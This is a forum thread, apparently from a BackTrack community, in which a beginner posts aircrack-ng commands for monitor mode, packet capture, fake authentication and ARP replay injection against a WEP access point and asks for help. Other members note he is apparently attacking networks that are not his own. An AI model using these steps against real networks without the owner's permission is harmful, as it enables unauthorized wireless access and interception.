Injecting with "Association Failure"? (WEP)

[yosinyc]

Hi

Thank you in advance for taking the time to help. It's my first time using BT3 LiveCD - using a Dell laptop with Broadcom BCM43xx.

I'll ask the questions as I run the commands by you:

bt ~ # airmon-ng stop eth1

reply: eth1 Broadcom bcm43xx

bt ~ # airmon-ng start eth1 8

reply: (monitor mode enabled)

bt ~ # aireplay-ng -9 -e target -a 00:11:22:33:44:55 eth1

found 1 ap
injection is working!
30/30: 100%

First Question: Do I know for sure here that my card can inject based on the previous reply?

bt ~ # airodump-ng -c 8 --bssid 00:11:22:33:44:55 -w output eth1

I see the target AP with 1 station associated with it, packets are increasing ~3000 packet in 8 mins, looks nice and healthy so far.

Question 2: At this point, am I affecting the target AP performace at all or am I just listening and can run this for days without service interruption?

I opened a new shell and ran:

bt ~ # aireplay-ng -1 0 -e target -a 00:11:22:33:44:55 eth1 (-h is optional, it picked up my default MAC address)

-sending auth req. (open sys)
-switching to shared key auth
-sending auth req (shared key)
-auth 1/2 succ.
- you should specify a xor file...
- trying fragmented share key
- sending encrypted challenge
- challenge failure

I can't go beyond this point, I've tried many APs all were rejecting me in one way or another, only time I got successful was to an open linksys (figures).

In the manuals it says don't go beyond this point, injections wont work:

I went anyway to the next step: part of my learning curve testing different ways and curousity.

(new console)

bt ~ # aireplay-ng -3 -b 00:11:22:33:44:55 -h 66:77:88:99:00 eth1

lots of activity now both on this console and my airodump-ng (packets are increasing rapidly) -

Question 3: Is it actually benefiting the process or is this all fake auth reqs noise and wont help me crack the wep unless I associate successfuly?

Troubleshooting questions:
- is the 30/30 100% tells me I'm close enough to the access point?
- I tried faking my MAC to one of the associated stations, still auth failed.

Where do I go from here?

Your help is much appreciated for my learning curve and hopefully will benefit more newbies.

[routher]

1. You can be reasonably sure. Try setting your router to open auth and see if you can fake auth, then try ARP injection and see if the increase in #/s correlates to the number of packets you've sent.

2. Airodump is passive. You're simply capturing packets sent by associated clients.

3. Check tcpdump. If you see a bunch of deauth packets then you aren't gathering IVs so it's just noise.

For packet injection to work, you're going to have to turn off your monitoring interface and set the MAC to the same as one used by an associated client.

[lupin]

I've tried many APs all were rejecting me in one way or another, only time I got successful was to an open linksys

How many APs have you tried this on?

[imported_vvpalin]

first of all the yellow and red text isnt necessary

second its rather obvious you are not pentesting on your own stuff

third and most important search before you post TO SEE IF YOUR CARD WORKS

fourth its pretty clear what the name airodump-ng implies and what aireplay-ng implies aswell but if you cant figure it out SEARCH!!

now go read the RULES and pay special attention to the very first one

For packet injection to work, you're going to have to turn off your monitoring interface and set the MAC to the same as one used by an associated client.

and that's simply not true sorry

[lupin]

second its rather obvious you are not pentesting on your own stuff

Obviously, but its much more satisfying to get them to admit this by asking probing questions. Phishing a guilty response from them if you will.

Just pointing out the fact that they are doing this ruins all the potential fun.

[Archangel-Amael]

Obviously, but its much more satisfying to get them to admit this by asking probing questions. Phishing a guilty response from them if you will.

Just pointing out the fact that they are doing this ruins all the potential fun.

Looks like some one has been studying social engineering.

[imported_vvpalin]

Obviously, but its much more satisfying to get them to admit this by asking probing questions. Phishing a guilty response from them if you will.

Just pointing out the fact that they are doing this ruins all the potential fun.

oh i knew exactly what you where doing, lol i was even going to say something about it in my post

from now on however i'll keep my mouth shut and not spoil the fun

[lupin]

Looks like some one has been studying social engineering.

I try to never miss an opportunity to practice

[Archangel-Amael]

from now on however i'll keep my mouth shut and not spoil the fun

First just do a bit of reading on posts in the idiot's corner. There is some good reading there. Might not be to educational but most is rather funny.

[yosinyc]

point taken, sorry for contributing to the Idiot's corner. I don't mind reading the manuals, but this "social engineering" stuff is kinda kewl and I'm new to it, so I was eager to jump on... much thanks...

by the way: is something up with me & search or lots of people get no search results?? I get nothing on most of my searches so I turned to G.O.O.G.L.E and did: site:forums.remote-exploit.org "wahtever". -- got my answer thanks for the link vvpalin.


Also as for the color-codes, just meant to make it easier on the readers...